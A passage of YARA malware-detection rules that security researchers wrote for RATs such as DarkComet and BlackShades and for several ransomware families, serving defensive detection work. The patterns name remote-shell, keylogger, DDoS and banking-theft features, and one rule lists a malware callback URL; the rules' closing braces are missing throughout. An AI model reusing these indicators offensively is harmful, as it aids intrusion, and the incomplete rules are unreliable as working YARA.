   		$b5 = "#KCMDDC"   
   	condition:   
   		all of ($a*) or all of ($b*)   
rule DarkComet_2 : rat   
   {   
   	meta:   
   		description = "DarkComet"    
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-01-12"   
   		filetype = "memory"   
   		version = "1.0"    
      
   	strings:   
   		$a = "#BEGIN DARKCOMET DATA --"   
   		$b = "#EOF DARKCOMET DATA --"   
   		$c = "DC_MUTEX-"   
   		$k1 = "#KCMDDC5#-890"   
   		$k2 = "#KCMDDC51#-890"   
      
   	condition:   
   		any of them   
rule DarkComet_4  : RAT   
   {	meta:   
   		reference = "https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara"   
   	strings:   
   	    $a1 = "#BOT#"   
   	    $a2 = "WEBCAMSTOP"   
   	    $a3 = "UnActiveOnlineKeyStrokes"   
   	    $a4 = "#SendTaskMgr"   
   	    $a5 = "#RemoteScreenSize"   
   	    $a6 = "ping 127.0.0.1 -n 4 > NUL &&"   
   	condition:   
   		all of them   
rule DarkComet_5   
   {    
   	meta:   
   		maltype = "DarkComet RAT"   
   		author = "https://github.com/reed1713"   
   		description = "Malware creates the MSDCSC directory, which is a common path utilized by DarkComet, as well as the mutex pattern."   
   	strings:   
   		$type="Microsoft-Windows-Security-Auditing"   
   		$eventid="4688"   
   		$data=/AppData\\Local\\Temp\\MSDCSC\\.+\.exe/   
      
   		$type1="Microsoft-Windows-Security-Auditing"   
   		$eventid1="4674"   
   		$data1=/DC_MUTEX-[0-9A-Z]{7}/   
   	condition:   
   		($type and $eventid and $data) or ($type1 and $eventid1 and $data1)   
rule DarkComet_1 : RAT   
   {   
       meta:   
           description = "DarkComet RAT"   
   	author = "botherder https://github.com/botherder"   
      
       strings:   
           $bot1 = /(#)BOT#OpenUrl/ wide ascii   
           $bot2 = /(#)BOT#Ping/ wide ascii   
           $bot3 = /(#)BOT#RunPrompt/ wide ascii   
           $bot4 = /(#)BOT#SvrUninstall/ wide ascii   
           $bot5 = /(#)BOT#URLDownload/ wide ascii   
           $bot6 = /(#)BOT#URLUpdate/ wide ascii   
           $bot7 = /(#)BOT#VisitUrl/ wide ascii   
           $bot8 = /(#)BOT#CloseServer/ wide ascii   
      
           $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii   
           $ddos2 = /(D)DOSSYNFLOOD/ wide ascii   
           $ddos3 = /(D)DOSUDPFLOOD/ wide ascii   
      
           $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii   
           $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii   
           $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii   
           $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii   
      
           $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii   
           $shell2 = /(S)UBMREMOTESHELL/ wide ascii   
           $shell3 = /(K)ILLREMOTESHELL/ wide ascii   
      
       condition:   
           4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)   
rule DarkComet_Keylogger_File  : RAT   
   {   
   	meta:   
   		author = "Florian Roth"   
   		description = "Looks like a keylogger file created by DarkComet Malware"   
   		date = "25.07.14"   
   		reference = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"   
   		score = 50   
   	strings:   
   		$magic = "::"   
   		$entry = /\n:: [A-Z]/   
   		$timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/   
   	condition:   
   		($magic at 0) and #entry > 10 and #timestamp > 10   
// https://otx.alienvault.com/pulse/5950d63b4797aa61b789b43f
rule CyberGate : RAT   
   {   
      
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/CyberGate"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}   
   		$string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}   
   		$string3 = "EditSvr"   
   		$string4 = "TLoader"   
   		$string5 = "Stroks"   
   		$string6 = "####@####"   
   		$res1 = "XX-XX-XX-XX"   
   		$res2 = "CG-CG-CG-CG"   
      
   	condition:   
   		all of ($string*) and any of ($res*)   
// https://otx.alienvault.com/pulse/5977be97481b4c644ff5f812
rule Crimson: RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		Description = "Crimson Rat"   
   		date = "2015/05"   
   		ref = "http://malwareconfig.com/stats/Crimson"   
   		maltype = "Remote Access Trojan"   
   		filetype = "jar"   
      
   	strings:   
   		$a1 = "com/crimson/PK"   
   		$a2 = "com/crimson/bootstrapJar/PK"   
   		$a3 = "com/crimson/permaJarMulti/PermaJarReporter$1.classPK"   
   		$a4 = "com/crimson/universal/containers/KeyloggerLog.classPK"   
           $a5 = "com/crimson/universal/UploadTransfer.classPK"   
              
   	condition:   
           all of ($a*)   
// https://otx.alienvault.com/pulse/5977bd44a87db7669ccaeee0
rule Cerberus : RAT memory   
   {   
   	meta:   
   		description = "Cerberus"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-01-12"   
   		filetype = "memory"   
   		version = "1.0"    
      
   	strings:   
   		$checkin = "Ypmw1Syv023QZD"   
   		$clientpong = "wZ2pla"   
   		$serverping = "wBmpf3Pb7RJe"   
   		$generic = "cerberus" nocase   
      
   	condition:   
   		any of them   
// https://otx.alienvault.com/pulse/5896576700f3d31cddc29874
rule Bozok : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Bozok"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "getVer" nocase   
   		$b = "StartVNC" nocase   
   		$c = "SendCamList" nocase   
   		$d = "untPlugin" nocase   
   		$e = "gethostbyname" nocase   
      
   	condition:   
   		all of them   
// https://otx.alienvault.com/pulse/5977ba6af7cda569f357bdba
rule Bolonyokte : rat    
   {   
   	meta:   
   		description = "UnknownDotNet RAT - Bolonyokte"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-02-01"   
   		filetype = "memory"   
   		version = "1.0"    
      
   	strings:   
   		$campaign1 = "Bolonyokte" ascii wide   
   		$campaign2 = "donadoni" ascii wide   
   		   
   		$decoy1 = "nyse.com" ascii wide   
   		$decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide   
   		$decoy3 = "bf13-5d45cb40" ascii wide   
   		   
   		$artifact1 = "Backup.zip"  ascii wide   
   		$artifact2 = "updates.txt" ascii wide   
   		$artifact3 = "vdirs.dat" ascii wide   
   		$artifact4 = "default.dat"   
   		$artifact5 = "index.html"   
   		$artifact6 = "mime.dat"   
   		   
   		$func1 = "FtpUrl"   
   		$func2 = "ScreenCapture"   
   		$func3 = "CaptureMouse"   
   		$func4 = "UploadFile"   
      
   		$ebanking1 = "Internet Banking" wide   
   		$ebanking2 = "(Online Banking)|(Online banking)"   
   		$ebanking3 = "(e-banking)|(e-Banking)" nocase   
   		$ebanking4 = "login"   
   		$ebanking5 = "en ligne" wide   
   		$ebanking6 = "bancaires" wide   
   		$ebanking7 = "(eBanking)|(Ebanking)" wide   
   		$ebanking8 = "Anmeldung" wide   
   		$ebanking9 = "internet banking" nocase wide   
   		$ebanking10 = "Banking Online" nocase wide   
   		$ebanking11 = "Web Banking" wide   
   		$ebanking12 = "Power"   
      
   	condition:   
   		any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)   
// https://otx.alienvault.com/pulse/5977ba01481b4c60c1f5f813
rule BlackShades_4 : rat   
   {   
   	meta:   
   		description = "BlackShades"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-01-12"   
   		filetype = "memory"   
   		version = "1.0"    
      
   	strings:   
   		$a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }   
   		$b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }   
   		$c = { 62 73 73 5F 73 65 72 76 65 72 }   
   		$d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }   
   		$e = { 6D 6F 64 49 6E 6A 50 45 }   
   		$apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"   
      
   	condition:   
   		any of ($a, $b, $c, $d, $e) or $apikey		   
rule BlackShades : Trojan   
   {   
   	meta:   
   		author="Kevin Falcoz"   
   		date="26/06/2013"   
   		description="BlackShades Server"   
   		   
   	strings:   
   		$signature1={62 73 73 5F 73 65 72 76 65 72}   
   		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}   
   		$signature3={6D 6F 64 49 6E 6A 50 45}   
   		   
   	condition:   
   		$signature1 and $signature2 and $signature3   
rule BlackShades2 : Trojan RAT   
   {   
   	meta:   
   		author="Kevin Falcoz"   
   		date="26/06/2013"   
   		description="BlackShades Server"   
   		   
   	strings:   
   		$signature1={62 73 73 5F 73 65 72 76 65 72}   
   		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}   
   		$signature3={6D 6F 64 49 6E 6A 50 45}   
   		   
   	condition:   
   		$signature1 and $signature2 and $signature3   
rule BlackShades_3 : Trojan RAT   
   {   
       meta:   
           description = "BlackShades RAT"   
   	author = "botherder https://github.com/botherder"   
      
       strings:   
           $mod1 = /(m)odAPI/   
           $mod2 = /(m)odAudio/   
           $mod3 = /(m)odBtKiller/   
           $mod4 = /(m)odCrypt/   
           $mod5 = /(m)odFuctions/   
           $mod6 = /(m)odHijack/   
           $mod7 = /(m)odICallBack/   
           $mod8 = /(m)odIInet/   
           $mod9 = /(m)odInfect/   
           $mod10 = /(m)odInjPE/   
           $mod11 = /(m)odLaunchWeb/   
           $mod12 = /(m)odOS/   
           $mod13 = /(m)odPWs/   
           $mod14 = /(m)odRegistry/   
           $mod15 = /(m)odScreencap/   
           $mod16 = /(m)odSniff/   
           $mod17 = /(m)odSocketMaster/   
           $mod18 = /(m)odSpread/   
           $mod19 = /(m)odSqueezer/   
           $mod20 = /(m)odSS/   
           $mod21 = /(m)odTorrentSeed/   
      
           $tmr1 = /(t)mrAlarms/   
           $tmr2 = /(t)mrAlive/   
           $tmr3 = /(t)mrAnslut/   
           $tmr4 = /(t)mrAudio/   
           $tmr5 = /(t)mrBlink/   
           $tmr6 = /(t)mrCheck/   
           $tmr7 = /(t)mrCountdown/   
           $tmr8 = /(t)mrCrazy/   
           $tmr9 = /(t)mrDOS/   
           $tmr10 = /(t)mrDoWork/   
           $tmr11 = /(t)mrFocus/   
           $tmr12 = /(t)mrGrabber/   
           $tmr13 = /(t)mrInaktivitet/   
           $tmr14 = /(t)mrInfoTO/   
           $tmr15 = /(t)mrIntervalUpdate/   
           $tmr16 = /(t)mrLiveLogger/   
           $tmr17 = /(t)mrPersistant/   
           $tmr18 = /(t)mrScreenshot/   
           $tmr19 = /(t)mrSpara/   
           $tmr20 = /(t)mrSprid/   
           $tmr21 = /(t)mrTCP/   
           $tmr22 = /(t)mrUDP/   
           $tmr23 = /(t)mrWebHide/   
      
       condition:       
           10 of ($mod*) or 10 of ($tmr*)   
rule BlackShades_25052015   
   {   
       meta:   
           author = "Brian Wallace (@botnet_hunter)"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/PoisonIvy"   
           ref = "http://blog.cylance.com/a-study-in-bots-blackshades-net"   
           family = "blackshades"   
      
       strings:   
           $string1 = "bss_server"   
           $string2 = "txtChat"   
           $string3 = "UDPFlood"   
       condition:   
           all of them   
// https://otx.alienvault.com/pulse/5667d30a67db8c0fd9b05c3a
rule Adzok : binary RAT Adzok   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		Description = "Adzok Rat"   
   		Versions = "Free 1.0.0.3,"   
   		date = "2015/05"   
   		ref = "http://malwareconfig.com/stats/Adzok"   
   		maltype = "Remote Access Trojan"   
   		filetype = "jar"   
      
   	strings:   
   		$a1 = "config.xmlPK"   
   		$a2 = "key.classPK"   
   		$a3 = "svd$1.classPK"   
   		$a4 = "svd$2.classPK"   
       	$a5 = "Mensaje.classPK"   
   		$a6 = "inic$ShutdownHook.class"   
   		$a7 = "Uninstall.jarPK"   
   		$a8 = "resources/icono.pngPK"   
              
   	condition:   
       7 of ($a*)   
// https://otx.alienvault.com/pulse/5977b89ba87db76356caeee0
rule CryptoLocker_set1   
   	{   
   	meta:   
   		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"   
   		date = "2014-04-13"   
   		description = "Detection of Cryptolocker Samples"   
   		   
   	strings:   
   		$string0 = "static"   
   		$string1 = " kscdS"   
   		$string2 = "Romantic"   
   		$string3 = "CompanyName" wide   
   		$string4 = "ProductVersion" wide   
   		$string5 = "9%9R9f9q9"   
   		$string6 = "IDR_VERSION1" wide   
   		$string7 = "  </trustInfo>"   
   		$string8 = "LookFor" wide   
   		$string9 = ":n;t;y;"   
   		$string10 = "        <requestedExecutionLevel level"   
   		$string11 = "VS_VERSION_INFO" wide   
   		$string12 = "2.0.1.0" wide   
   		$string13 = "<assembly xmlns"   
   		$string14 = "  <trustInfo xmlns"   
   		$string15 = "srtWd@@"   
   		$string16 = "515]5z5"   
   		$string17 = "C:\\lZbvnoVe.exe" wide   
   	condition:   
   		12 of ($string*)   
rule CryptoLocker_rule2   
   	{   
   	meta:   
   		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"   
   		date = "2014-04-14"   
   		description = "Detection of CryptoLocker Variants"   
   	strings:   
   		$string0 = "2.0.1.7" wide   
   		$string1 = "    <security>"   
   		$string2 = "Romantic"   
   		$string3 = "ProductVersion" wide   
   		$string4 = "9%9R9f9q9"   
   		$string5 = "IDR_VERSION1" wide   
   		$string6 = "button"   
   		$string7 = "    </security>"   
   		$string8 = "VFileInfo" wide   
   		$string9 = "LookFor" wide   
   		$string10 = "      </requestedPrivileges>"   
   		$string11 = " uiAccess"   
   		$string12 = "  <trustInfo xmlns"   
   		$string13 = "last.inf"   
   		$string14 = " manifestVersion"   
   		$string15 = "FFFF04E3" wide   
   		$string16 = "3,31363H3P3m3u3z3"   
   	condition:   
   		12 of ($string*)   
rule Ransom_Satana   
   	{   
   	    meta:   
   	        description = "Regla para detectar Ransom.Satana"   
   	        author = "CCN-CERT"   
   	        version = "1.0"   
   	    strings:   
   	        $a = { 21 00 73 00 61 00 74 00 61 00 6E 00 61 00 21 00 2E 00 74 00 78 00 74 00 00 }   
   	        $b = { 74 67 77 79 75 67 77 71 }   
   	        $c = { 53 77 76 77 6E 67 75 }   
   	        $d = { 45 6E 75 6D 4C 6F 63 61 6C 52 65 73 }   
   	        $e = { 57 4E 65 74 4F 70 65 6E 45 6E 75 6D 57 00 }   
   	        $f = { 21 53 41 54 41 4E 41 21 }   
   	    condition:   
   	        $b or $c and $d and $a and $e and $f   
rule legion_777   
   	{   
   	    meta:   
   	        author = "Daxda (https://github.com/Daxda)"   
   	        date = "2016/6/6"   
   	        description = "Detects an UPX-unpacked .777 ransomware binary."   
   	        ref = "https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion"   
   	        category = "Ransomware"   
   	        sample = "SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548"   
      
      
   	    strings:   
   	        $s1 = "http://tuginsaat.com/wp-content/themes/twentythirteen/stats.php"   
   	        $s2 = "read_this_file.txt" wide // Ransom note filename.   
   	        $s3 = "seven_legion@india.com" // Part of the format string used to rename files.   
   	        $s4 = {46 4f 52 20 44 45 43 52 59 50 54 20 46 49 4c 45 53 0d 0a 53 45 4e 44 20 4f   
   	               4e 45 20 46 49 4c 45 20 49 4e 20 45 2d 4d 41 49 4c 0d 0a 73 65 76 65 6e 5f   
   	               6c 65 67 69 6f 6e 40 69 6e 64 69 61 2e 63 6f 6d } // Ransom note content.   
   	        $s5 = "%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777" // Renaming format string.   
      
      
   	    condition:   
   	        4 of ($s*)   
rule Ransom_Satana_Dropper   
   	{   
   	    meta:   
   	        description = "Regla para detectar el dropper de Ransom.Satana"   
   	        author = "CCN-CERT"   
   	        version = "1.0"   
   	    strings:   
   	        $a = { 25 73 2D 54 72 79 45 78 63 65 70 74 }   
   	        $b = { 64 3A 5C 6C 62 65 74 77 6D 77 79 5C 75 69 6A 65 75 71 70 6C 66 77 75 62 2E 70 64 62 }   
   	        $c = { 71 66 6E 74 76 74 68 62 }   
   	    condition:   
   	        all of them   
rule Ransom_Alfa   
   	{   
   	meta:   
   	description = "Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos)"   
   	author = "CCN-CERT"   
   	version = "1.0"   
   	strings:   
   	$a = { 8B 0C 97 81 E1 FF FF 00 00 81 F9 19 04 00 00 74 0F 81 F9 }    
   	$b = { 22 04 00 00 74 07 42 3B D0 7C E2 EB 02 }   
   	condition:   
   	all of them   
rule BackdoorFCKG: CTB_Locker_Ransomware   
   	{   
   	meta:   
   	author = "ISG"   
   	date = "2015-01-20"   
   	reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"   
   	description = "CTB_Locker"   
      
      
   	strings:   
   	$string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"   
   	$stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    
   	$string2 = "keme132.DLL"    
   	$string3 = "klospad.pdb"    
   	condition:   
   	3 of them    
rule SVG_LoadURL {   
   		meta:   
   			description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"   
   			author = "Florian Roth"   
   			reference = "http://goo.gl/psjCCc"   
   			date = "2015-05-24"   
   			hash1 = "ac8ef9df208f624be9c7e7804de55318"   
   			hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"   
   			hash3 = "7e2be5cc785ef7711282cea8980b9fee"   
   			hash4 = "4e2c6f6b3907ec882596024e55c2b58b"   
   			score = 50   
   		strings:   
   			$s1 = "</svg>" nocase   
   			$s2 = "<script>" nocase   
   			$s3 = "location.href='http" nocase   
   		condition:   
   			all of ($s*) and filesize < 600   
rule DMALocker4 : ransom {   
      
      
   	    meta:   
   	    Description = "Deteccion del ransomware DMA Locker version 4.0"   
   	    ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"   
   	    Author = "SadFud"   
   	    Date = "30/05/2016"   
   		Hash = "e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1"   
   	       
   	    strings:   
   	    $clave = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 }   
   	       
   	    condition:   
   	    $clave    
   	       
rule Win32Toxic : tox ransomware   
   	{   
   	meta:   
   		author = "@GelosSnake"   
   		date = "2015-06-02"   
   		description = "https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us"   
   		hash0 = "70624c13be4d8a4c1361be38b49cb3eb"   
   		hash1 = "4f20d25cd3ae2e5c63d451d095d97046"   
   		hash2 = "e0473434cc83b57c4b579d585d4c4c57"   
   		hash3 = "c52090d184b63e5cc71b524153bb079e"   
   		hash4 = "7ac0b49baba9914b234cde62058c96a5"   
   		hash5 = "048c007de4902b6f4731fde45fa8e6a9"   
   		hash6 = "238ef3e35b14e304c87b9c62f18953a9"   
   		hash7 = "8908ccd681f66429c578a889e6e708e1"   
   		hash8 = "de9fe2b7d9463982cc77c78ee51e4d51"   
   		hash9 = "37add8d26a35a3dc9700b92b67625fa4"   
   		hash10 = "a0f30e89a3431fca1d389f90dba1d56e"   
   		hash11 = "d4d0658302c731003bf0683127618bd9"   
   		hash12 = "d1d89e1c7066f41c1d30985ac7b569db"   
   		hash13 = "97d52d7281dfae8ff9e704bf30ce2484"   
   		hash14 = "2cc85be01e86e0505697cf61219e66da"   
   		hash15 = "02ecfb44b9b11b846ea8233d524ecda3"   
   		hash16 = "703a6ebe71131671df6bc92086c9a641"   
   		hash17 = "df23629b4a4aed05d6a453280256c05a"   
   		hash18 = "07466ff2572f16c63e1fee206b081d11"   
   		hash19 = "792a1c0971775d32bad374b288792468"   
   		hash20 = "fb7fd5623fa6b7791a221fad463223cd"   
   		hash21 = "83a562aab1d66e5d170f091b2ae6a213"   
   		hash22 = "99214c8c9ff4653b533dc1b19a21d389"   
   		hash23 = "a92aec198eee23a3a9a145e64d0250ee"   
   		hash24 = "e0f7e6b96ca72b9755965b9dac3ce77e"   
   		hash25 = "f520fc947a6d5edb87aa01510bee9c8d"   
   		hash26 = "6d7babbe5e438539a9fa2c5d6128d3b4"   
   		hash27 = "3133c2231fcee5d6b0b4c988a5201da1"   
   		hash28 = "e5b1d198edc413376e0c0091566198e4"   
   		hash29 = "50515b5a6e717976823895465d5dc684"   
   		hash30 = "510389e8c7f22f2076fc7c5388e01220"   
   		hash31 = "60573c945aa3b8cfaca0bdb6dd7d2019"   
   		hash32 = "394187056697463eba97382018dfe151"   
   		hash33 = "045a5d3c95e28629927c72cf3313f4cd"   
   		hash34 = "70951624eb06f7db0dcab5fc33f49127"   
   		hash35 = "5def9e3f7b15b2a75c80596b5e24e0f4"   
   		hash36 = "35a42fb1c65ebd7d763db4abb26d33b0"   
   		hash37 = "b0030f5072864572f8e6ba9b295615fc"   
   		hash38 = "62706f48689f1ba3d1d79780010b8739"   
   		hash39 = "be86183fa029629ee9c07310cd630871"   
   		hash40 = "9755c3920d3a38eb1b5b7edbce6d4914"   
   		hash41 = "cb42611b4bed97d152721e8db5abd860"   
   		hash42 = "5475344d69fc6778e12dc1cbba23b382"   
   		hash43 = "8c1bf70742b62dec1b350a4e5046c7b6"   
   		hash44 = "6a6541c0f63f45eff725dec951ec90a7"   
   		hash45 = "a592c5bee0d81ee127cbfbcb4178afe8"   
   		hash46 = "b74c6d86ec3904f4d73d05b2797f1cc3"   
   		hash47 = "28d76fd4dd2dbfc61b0c99d2ad08cd8e"   
   		hash48 = "fc859ae67dc1596ac3fdd79b2ed02910"   
   		hash49 = "cb65d5e929da8ff5c8434fd8d36e5dfb"   
   		hash50 = "888dd1acce29cd37f0696a0284ab740a"   
   		hash51 = "0e3e231c255a5eefefd20d70c247d5f0"   
   		hash52 = "e5ebe35d934106f9f4cebbd84e04534b"   
   		hash53 = "3b580f1fa0c961a83920ce32b4e4e86d"   
   		hash54 = "d807a704f78121250227793ea15aa9c4"   
   		hash55 = "db462159bddc0953444afd7b0d57e783"   
   		hash56 = "2ed4945fb9e6202c10fad0761723cb0e"   
   		hash57 = "51183ab4fd2304a278e36d36b5fb990c"   
   		hash58 = "65d602313c585c8712ea0560a655ddeb"   
   		hash59 = "0128c12d4a72d14bb67e459b3700a373"   
   		hash60 = "5d3dfc161c983f8e820e59c370f65581"   
   		hash61 = "d4dd475179cd9f6180d5b931e8740ed6"   
   		hash62 = "5dd3782ce5f94686448326ddbbac934c"   
   		hash63 = "c85c6171a7ff05d66d497ad0d73a51ed"   
   		hash64 = "b42dda2100da688243fe85a819d61e2e"   
   		hash65 = "a5cf8f2b7d97d86f4d8948360f3db714"   
   		hash66 = "293cae15e4db1217ea72581836a6642c"   
   		hash67 = "56c3a5bae3cb1d0d315c1353ae67cf58"   
   		hash68 = "c86dc1d0378cc0b579a11d873ac944e7"   
   		hash69 = "54cef0185798f3ec1f4cb95fad4ddd7c"   
   		hash70 = "eb2eff9838043b67e8024ccadcfe1a8f"   
   		hash71 = "78778fe62ee28ef949eec2e7e5961ca8"   
   		hash72 = "e75c5762471a490d49b79d01da745498"   
   		hash73 = "1564d3e27b90a166a0989a61dc3bd646"   
   		hash74 = "59ba111403842c1f260f886d69e8757d"   
   		hash75 = "d840dfbe52a04665e40807c9d960cccc"   
   		hash76 = "77f543f4a8f54ecf84b15da8e928d3f9"   
   		hash77 = "bd9512679fdc1e1e89a24f6ebe0d5ad8"   
   		hash78 = "202f042d02be4f6469ed6f2e71f42c04"   
   		hash79 = "28f827673833175dd9094002f2f9b780"   
   		hash80 = "0ff10287b4c50e0d11ab998a28529415"   
   		hash81 = "644daa2b294c5583ce6aa8bc68f1d21f"   
   		hash82 = "1c9db47778a41775bbcb70256cc1a035"   
   		hash83 = "c203bc5752e5319b81cf1ca970c3ca96"   
   		hash84 = "656f2571e4f5172182fc970a5b21c0e7"   
   		hash85 = "c17122a9864e3bbf622285c4d5503282"   
   		hash86 = "f9e3a9636b45edbcef2ee28bd6b1cfbb"   
   		hash87 = "291ff8b46d417691a83c73a9d3a30cc9"   
   		hash88 = "1217877d3f7824165bb28281ccc80182"   
   		hash89 = "18419d775652f47a657c5400d4aef4a3"   
   		hash90 = "04417923bf4f2be48dd567dfd33684e2"   
   		hash91 = "31efe902ec6a5ab9e6876cfe715d7c84"   
   		hash92 = "a2e4472c5097d7433b91d65579711664"   
   		hash93 = "98854d7aba1874c39636ff3b703a1ed1"   
   		hash94 = "5149f0e0a56b33e7bbed1457aab8763f"   
   		hash95 = "7a4338193ce12529d6ae5cfcbb1019af"   
   		hash96 = "aa7f37206aba3cbe5e11d336424c549a"   
   		hash97 = "51cad5d45cdbc2940a66d044d5a8dabf"   
   		hash98 = "85edb7b8dee5b60e3ce32e1286207faa"   
   		hash99 = "34ca5292ae56fea78ba14abe8fe11f06"   
   		hash100 = "154187f07621a9213d77a18c0758960f"   
   		hash101 = "4e633f0478b993551db22afddfa22262"   
   		hash102 = "5c50e4427fe178566cada96b2afbc2d4"   
   		hash103 = "263001ac21ef78c31f4ca7ad2e7f191d"   
   		hash104 = "53fd9e7500e3522065a2dabb932d9dc5"   
   		hash105 = "48043dc55718eb9e5b134dac93ebb5f6"   
   		hash106 = "ca19a1b85363cfed4d36e3e7b990c8b6"   
   		hash107 = "41b5403a5443a3a84f0007131173c126"   
   		hash108 = "6f3833bc6e5940155aa804e58500da81"   
   		hash109 = "9bd50fcfa7ca6e171516101673c4e795"   
   		hash110 = "6d52ba0d48d5bf3242cd11488c75b9a7"   
   		hash111 = "c52afb663ff4165e407f53a82e34e1d5"   
   		hash112 = "5a16396d418355731c6d7bb7b21e05f7"   
   		hash113 = "05559db924e71cccee87d21b968d0930"   
   		hash114 = "824312bf8e8e7714616ba62997467fa8"   
   		hash115 = "dfec435e6264a0bfe47fc5239631903c"   
   		hash116 = "3512e7da9d66ca62be3418bead2fb091"   
   		hash117 = "7ad4df88db6f292e7ddeec7cf63fa2bc"   
   		hash118 = "d512da73d0ca103df3c9e7c074babc99"   
   		hash119 = "c622b844388c16278d1bc768dcfbbeab"   
   		hash120 = "170ffa1cd19a1cecc6dae5bdd10efb58"   
   		hash121 = "3a19c91c1c0baa7dd4a9def2e0b7c3e9"   
   		hash122 = "3b7ce3ceb8d2b85ab822f355904d47ce"   
   		hash123 = "a7bac2ace1f04a7ad440bd2f5f811edc"   
   		hash124 = "66594a62d8c98e1387ec8deb3fe39431"   
   		hash125 = "a1add9e5d7646584fd4140528d02e4c3"   
   		hash126 = "11328bbf5a76535e53ab35315321f904"   
   		hash127 = "048f19d79c953e523675e96fb6e417a9"   
   		hash128 = "eb65fc2922eafd62defd978a3215814b"   
   		hash129 = "51cc9987f86a76d75bf335a8864ec250"   
   		hash130 = "a7f91301712b5a3cc8c3ab9c119530ce"   
   		hash131 = "de976a5b3d603161a737e7b947fdbb9a"   
   		hash132 = "288a3659cc1aec47530752b3a31c232b"   
   		hash133 = "91da679f417040558059ccd5b1063688"   
   		hash134 = "4ce9a0877b5c6f439f3e90f52eb85398"   
   		hash135 = "1f9e097ff9724d4384c09748a71ef99d"   
   		hash136 = "7d8a64a94e71a5c24ad82e8a58f4b7e6"   
   		hash137 = "db119e3c6b57d9c6b739b0f9cbaeb6fd"   
   		hash138 = "52c9d25179bf010a4bb20d5b5b4e0615"   
   		hash139 = "4b9995578d51fb891040a7f159613a99"   
   		sample_filetype = "exe"   
   		yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   	strings:   
   		$string0 = "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<"   
   		$string1 = "t;<<t;<<t<<<t<<"   
   		$string2 = ">>><<<"   
   	condition:   
   		2 of them   
rule Ransom_Alpha   
   	{   
   	meta:   
   	description = "Regla para detectar Ransom.Alpha (posibles falsos positivos)"   
   	author = "CCN-CERT"   
   	version = "1.0"   
   	strings:   
   	$a = { 52 00 65 00 61 00 64 00 20 00 4D 00 65 00 20 00 28 00 48 00 6F 00 77 00 20 00 44 00 65 00 63 }   
   	condition:   
   	$a   
rule Ransom_Crypren {   
       meta:   
           weight = 1   
           Author = "@pekeinfo"   
           reference = "https://github.com/pekeinfo/DecryptCrypren"   
       strings:    
           $a = "won't be able to recover your files anymore.</p>"   
           $b = {6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ??}   
           $c = "Please restart your computer and wait for instructions for decrypting your files"   
